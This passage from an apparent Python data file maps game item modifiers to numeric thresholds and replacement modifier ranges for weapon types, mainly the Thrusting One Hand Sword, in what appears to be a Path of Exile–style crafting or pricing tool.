"Adds # to # Cold Damage to Spells": [(100, 'Adds (4 - 6) to (8 - 13) Cold Damage to Spells'), (180, 'Adds (7 - 11) to (14 - 20) Cold Damage to Spells'), (250, 'Adds (12 - 16) to (21 - 28) Cold Damage to Spells'), (280, 'Adds (17 - 21) to (28 - 38) Cold Damage to Spells'), (1000, 'Adds (22 - 26) to (31 - 46) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(150, 'Adds (7 - 12) to (13 - 21) Fire Damage'), (300, 'Adds (13 - 19) to (22 - 35) Fire Damage'), (375, 'Adds (20 - 27) to (36 - 48) Fire Damage'), (450, 'Adds (28 - 35) to (49 - 64) Fire Damage'), (1000, 'Adds (36 - 45) to (65 - 80) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(100, 'Adds (5 - 9) to (10 - 15) Fire Damage to Spells'), (200, 'Adds (10 - 14) to (16 - 25) Fire Damage to Spells'), (275, 'Adds (14 - 19) to (26 - 34) Fire Damage to Spells'), (320, 'Adds (20 - 25) to (35 - 45) Fire Damage to Spells'), (1000, 'Adds (26 - 32) to (46 - 56) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(200, 'Adds 1 to (25 - 40) Lightning Damage'), (400, 'Adds (1 - 3) to (41 - 65) Lightning Damage'), (550, 'Adds (2 - 5) to (66 - 82) Lightning Damage'), (650, 'Adds (2 - 7) to (83 - 106) Lightning Damage'), (1000, 'Adds (3 - 9) to (107 - 125) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(150, 'Adds 1 to (18 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 46) Lightning Damage to Spells'), (450, 'Adds (2 - 4) to (47 - 58) Lightning Damage to Spells'), (540, 'Adds (2 - 5) to (59 - 75) Lightning Damage to Spells'), (1000, 'Adds (3 - 7) to (75 - 88) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(50, 'Adds 1 to (2 - 3) Physical Damage'), (100, 'Adds (2 - 3) to (4 - 5) Physical Damage'), (150, 'Adds (4 - 5) to (6 - 7) Physical Damage'), (180, 'Adds (6 - 7) to (8 - 10) Physical Damage'), (500, 'Adds (8 - 9) to (11 - 13) Physical Damage')],
"Always Freezes Enemies on Hit": [(60, 'Always Freezes Enemies on Hit'), (90, 'Always Freezes Enemies on Hit'), (200, 'Always Freezes Enemies on Hit\n(12 - 15)% increased Freeze Duration on Enemies')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(25 - 28)% increased Chaos Damage'), (44, '(29 - 32)% increased Chaos Damage'), (100, '(33 - 36)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(21 - 26)% increased Elemental Damage'), (44, '(27 - 32)% increased Elemental Damage'), (100, '(33 - 38)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(5, 'You and Allies affected by your Aura Skills deal (13 - 16)% increased Damage'), (9, 'You and Allies affected by your Aura Skills deal (17 - 21)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (22 - 25)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(29 - 32)% increased Chaos Damage'), (22, '(33 - 36)% increased Chaos Damage'), (50, '(37 - 40)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(22, '(33 - 36)% increased Cold Damage'), (44, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(22, '(33 - 36)% increased Fire Damage'), (44, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(22, '(33 - 36)% increased Lightning Damage'), (44, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Cold Damage'), (70, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage\nGain (7 - 10)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Fire Damage'), (70, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage\nGain (7 - 10)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Lightning Damage'), (70, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage\nGain (7 - 10)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(10, '(25 - 28)% increased Chaos Damage'), (20, '(29 - 32)% increased Chaos Damage'), (50, '(33 - 36)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(35, '(27 - 32)% increased Global Physical Damage'), (70, '(33 - 38)% increased Global Physical Damage'), (100, '(39 - 44)% increased Global Physical Damage\nGain (7 - 10)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(22, '(29 - 35)% increased Attack Damage'), (44, '(36 - 44)% increased Attack Damage'), (100, '(45 - 51)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(22, '(29 - 35)% increased Spell Damage'), (44, '(36 - 44)% increased Spell Damage'), (100, '(45 - 51)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(25 - 28)% increased Chaos Damage'), (2, '(29 - 32)% increased Chaos Damage'), (10, '(33 - 36)% increased Chaos Damage')],
},
"Thrusting One Hand Sword": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (1 - 2) to (3 - 4) Cold Damage to Attacks with this Weapon per 10 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (1 - 2) to (3 - 4) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"Two Hand Axe": {
